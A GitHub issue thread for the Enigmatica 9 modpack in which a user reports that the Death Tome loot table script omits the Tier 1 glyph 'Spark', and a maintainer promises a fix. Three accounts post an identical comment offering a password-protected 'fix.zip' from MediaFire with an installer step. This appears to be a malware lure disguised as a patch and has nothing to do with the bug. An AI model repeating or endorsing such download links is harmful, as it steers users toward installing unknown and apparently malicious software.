### ISSUE TITLE
[E9:E] Death Tomes Don't Drop Tier 1 Glyph 'Spark'

### ISSUE THREAD

**Issue by KienaTesedale** [EnigmaticaModpacks/Enigmatica9#1003]
### Modpack Version

1.22.1

### Describe your issue.

The Death Tomes seem to be intended to drop every Tier 1 Glyph.  However, they do not drop the Tier 1 Glyph "Spark". I got every other Tier 1 glyph from them, but not Spark. I also looked at the kubejs\server_scripts\normal\loot_tables\entities\twilightforest\death_tome.js file and Spark is not listed in there. This likely affects regular E9 too, given the file's location, but I haven't played that.

### Have you modified the modpack?

No

### Did the issue happen in singleplayer or on a server?

Singleplayer

### Discord Username

kiena_tesedale

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MuteTiefling** [comment]
Thanks for the report! We'll get that fixed up here.
